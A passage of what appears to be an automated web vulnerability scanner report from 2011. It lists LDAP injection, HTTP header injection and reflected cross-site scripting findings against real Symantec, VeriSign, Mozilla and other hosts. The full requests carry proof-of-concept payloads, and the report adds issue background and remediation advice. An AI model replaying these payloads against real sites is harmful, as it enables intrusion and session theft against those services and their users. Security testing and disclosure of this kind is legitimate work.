GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)!(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:36 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The timeout parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the timeout parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603887:-1:1315604093:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=*)!(sn=*&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:10 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 94

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":""}});

2. HTTP header injection previous next
There are 5 instances of this issue:

/toolbar/activate.v [REST URL parameter 2]
/toolbar/download.v [REST URL parameter 2]
/toolbar/downloadIE.v [REST URL parameter 2]
/toolbar/home.v [REST URL parameter 2]
/toolbar/install.v [REST URL parameter 2]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/activate.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b75a9%0d%0a75e798ebedb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b75a9%0d%0a75e798ebedb HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/b75a9
75e798ebedb.v
Content-Length: 0
Connection: close
Content-Type: text/plain

2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/download.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e39d2%0d%0acc51e9a9020 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/e39d2%0d%0acc51e9a9020 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:54 GMT
Location: https://idprotect.verisign.com/toolbar/e39d2
cc51e9a9020.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/downloadIE.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b8c36%0d%0ab68ecacc3e6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/b8c36%0d%0ab68ecacc3e6 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/install.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:48:19 GMT
Location: https://idprotect.verisign.com/toolbar/b8c36
b68ecacc3e6.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/home.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 2c8db%0d%0a9a17d95f3a9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/2c8db%0d%0a9a17d95f3a9 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:42:10 GMT
Location: https://idprotect.verisign.com/toolbar/2c8db
9a17d95f3a9.v
Content-Length: 0
Connection: close
Content-Type: text/plain

2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/install.v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8796f%0d%0aaa90b981baa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /toolbar/8796f%0d%0aaa90b981baa HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:55 GMT
Location: https://idprotect.verisign.com/toolbar/8796f
aa90b981baa.v
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

3. Cross-site scripting (reflected) previous next
There are 35 instances of this issue:

https://cert.webtrust.org/ViewSeal [id parameter]
http://com-verisign.netmng.com/ [height parameter]
http://com-verisign.netmng.com/ [width parameter]
https://donate.mozilla.org/favicon.ico [REST URL parameter 1]
https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]
https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]
https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]
https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]
https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]
https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]
https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]
https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]
http://free.pctools.com/favicon.ico [REST URL parameter 1]
http://free.pctools.com/free-antivirus/ [REST URL parameter 1]
http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]
https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]
https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]
https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]
http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]
http://player.ooyala.com/player.js [playerId parameter]
http://player.ooyala.com/player.js [wmode parameter]
https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]
https://renewals.symantec.com/renewals/application [entry_point parameter]
http://updatecenter.norton.com/ [NUCLANG parameter]
http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]
http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]
http://www.symantec.com/s/searchg/suggest [q parameter]
https://cert.webtrust.org/ViewSeal [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. https://cert.webtrust.org/ViewSeal [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://cert.webtrust.org
Path:	/ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e2636<script>alert(1)</script>2536d5d1b26 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=304e2636<script>alert(1)</script>2536d5d1b26 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 20:14:35 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2976

java.lang.NumberFormatException: For input string: "304e2636<script>alert(1)</script>2536d5d1b26"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

3.2. http://com-verisign.netmng.com/ [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://com-verisign.netmng.com
Path:	/

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 42f25<script>alert(1)</script>04b6e822761 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754&height=42f25<script>alert(1)</script>04b6e822761&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:39 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:39 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18558

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754,42f25<script>alert(1)</script>04b6e822761, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\" nam
...[SNIP]...

3.3. http://com-verisign.netmng.com/ [width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://com-verisign.netmng.com
Path:	/

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload ef64f<script>alert(1)</script>1df44e97474 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?function=createPopinWindow&name=screen1&width=754ef64f<script>alert(1)</script>1df44e97474&height=400&rand=0.03673732164315879&nm_input_data=%22%22 HTTP/1.1
Host: com-verisign.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN_popin=1; evo5_VERISIGN=xep22ngsyerii%7COWn3FV9W0IGSJLrIppIRrZfSVe1We35EI4V4gBbixt8vL04ZKRREeQ778xI3DBjSo3Pq49K1cfcVvCg7qSIKn44I4XJ6cPR3Yj9Y3%2BMmEuQ5%2FYKzCkMnasBxmIRyKGTNYwlD1dvGPKbFxRFCvXppOCDQTBscyOfjUpXgtoyIAMmYbof2%2FajobILQpOxOi2Hs0x9UdZmRfM%2Fuoq9V0S17NeIqzDx%2BsP4gdfn5KCU%2F47pq%2B7rEF0aHB6ftFm0dez3T

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:36 GMT
Server: Apache/2.2.9
P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 07 Sep 2011 21:28:36 GMT
Last-Modified: Wed, 07 Sep 2011 21:28:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18562

nm_Popin.arrPopinWindow['screen1'].createPopinWindow(754ef64f<script>alert(1)</script>1df44e97474, 400, '<form name=\"screen1\" onsubmit=\"return false;\" method=\"get\"> <input type=\"hidden\"
...[SNIP]...

3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 559c1<script>alert(1)</script>34648dd8ac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico559c1<script>alert(1)</script>34648dd8ac9 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 310

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico559c1<script>alert(1)</script>34648dd8ac9</p><p><a href="http://donate.
...[SNIP]...

3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 29f1f<script>alert(1)</script>971a874b532 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751; X-CheckNode=; X-Mapping-jljaemke=1CFCBA838EC874D34F4F849FD7A403BC

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
X-Served-By: moz2
Connection: Keep-Alive
Set-Cookie: X-CheckNode=true; domain=donate.mozilla.org; path=/
Content-Length: 313

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /favicon.ico?29f1f<script>alert(1)</script>971a874b532=1</p><p><a href="http://dona
...[SNIP]...

3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://donate.mozilla.org
Path:	/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a47c6<script>alert(1)</script>68ca81f006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:57 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 390

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3Ca47c6<script>alert(1)</script>68ca81f006/script%3E98501cf3ded/contribute/openwebfund</p>
...[SNIP]...

